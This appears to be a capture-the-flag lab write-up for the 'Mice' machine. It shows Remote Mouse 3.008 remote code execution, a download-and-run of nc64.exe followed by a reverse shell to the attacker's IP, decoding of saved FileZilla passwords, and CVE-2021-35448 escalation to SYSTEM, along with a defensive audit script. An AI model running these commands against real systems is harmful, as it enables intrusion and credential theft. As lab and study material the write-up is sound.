Mice - Proving Grounds Practice
Enumeration
Nmap
Initial nmap scan revealed RDP and Remote Mouse ports were open.
Exploitation
Remote Mouse 3.008 RCE
Remote Mouse 3.008 was vulnerable to remote code execution by sending arbitrary mouse signals. Some research revealed p0dalirius/RemoteMouse-3.008-Exploit, which allows you to send any command you want.
- At first I transferred nc64.exe
  python RemoteMouse-3.008-Exploit.py -t 192.168.224.199 -c 'powershell iwr http://192.168.45.216/nc64.exe -outfile C:\ProgramData\nc64.exe' -v
- Then I executed it and obtained a reverse shell
  python RemoteMouse-3.008-Exploit.py --target-ip 192.168.224.199 --cmd 'powershell -c "C:\ProgramData\nc64.exe 192.168.45.216 80 -e cmd.exe"' -v
- Ports other than port 80 were not working, so I had to use port 80.
Then I simply read the local flag.
Privilege Escalation
FileZilla Password (recentservers.xml)
I executed WinPEAS.exe and found two available FileZilla files.
- C:\Users\divine\AppData\Roaming\FileZilla\filezilla.xml → version etc.
- C:\Users\divine\AppData\Roaming\FileZilla\recentservers.xml → session information, password etc.
I read both of them. I noted the FileZilla version, then read the base64-encoded FileZilla password.
Then I decoded the password and used RDP to log in as the same user we got the reverse shell as.
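The finding above works because recentservers.xml keeps the saved password only base64-encoded, not encrypted. As an added example (not part of the original writeup or of FileZilla), the following audit script flags such entries without printing the secret; the function name and the sample hosts, users and password value are constructed for illustration.

```python
import base64
import binascii
import sys
import xml.etree.ElementTree as ET

# Constructed sample in the <Server> layout FileZilla 3 uses for saved entries.
SAMPLE_XML = """<FileZilla3>
  <RecentServers>
    <Server>
      <Host>ftp.example.internal</Host>
      <Port>21</Port>
      <User>svc_backup</User>
      <Pass encoding="base64">Q29uc3RydWN0ZWQtUGFzcyE=</Pass>
    </Server>
    <Server>
      <Host>sftp.example.internal</Host>
      <Port>22</Port>
      <User>deploy</User>
    </Server>
  </RecentServers>
</FileZilla3>"""


def audit_saved_servers(xml_text):
    """Return one finding per <Server> whose <Pass> is only base64-encoded."""
    findings = []
    for server in ET.fromstring(xml_text).iter("Server"):
        pw = server.find("Pass")
        value = (pw.text or "").strip() if pw is not None else ""
        if not value or pw.get("encoding") != "base64":
            continue  # no stored password, or not the plain base64 form
        try:
            decoded = base64.b64decode(value, validate=True)
        except (binascii.Error, ValueError):
            continue  # malformed value, not a recoverable credential
        findings.append({
            "host": server.findtext("Host", default=""),
            "user": server.findtext("User", default=""),
            "password_length": len(decoded),  # report size only, never the secret
        })
    return findings


if __name__ == "__main__":
    # Usage: python audit_filezilla.py <path to recentservers.xml>
    xml_text = open(sys.argv[1], encoding="utf-8").read() if len(sys.argv) > 1 else SAMPLE_XML
    for f in audit_saved_servers(xml_text):
        print(f"[!] {f['user']}@{f['host']}: base64-only password ({f['password_length']} bytes)")
```

Any entry it reports should be treated as a plaintext credential readable by whoever can read that user's profile.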
CVE-2021-35448
Emote Interactive Remote Mouse 3.008 on Windows allows attackers to execute arbitrary programs as Administrator by using the Image Transfer Folder feature to navigate to cmd.exe. It binds to local ports to listen for incoming connections.
This version of Remote Mouse was vulnerable to GUI-based privilege escalation, and as we have an RDP session we could exploit this.
- Open Remote Mouse from the system tray
- Go to “Settings”
- Click “Change…” in “Image Transfer Folder” section
- “Save As” prompt will appear
- Enter “C:\Windows\System32\cmd.exe” in the address bar and click enter
- A new command prompt is spawned with SYSTEM privileges
Then I simply read the Administrator flag.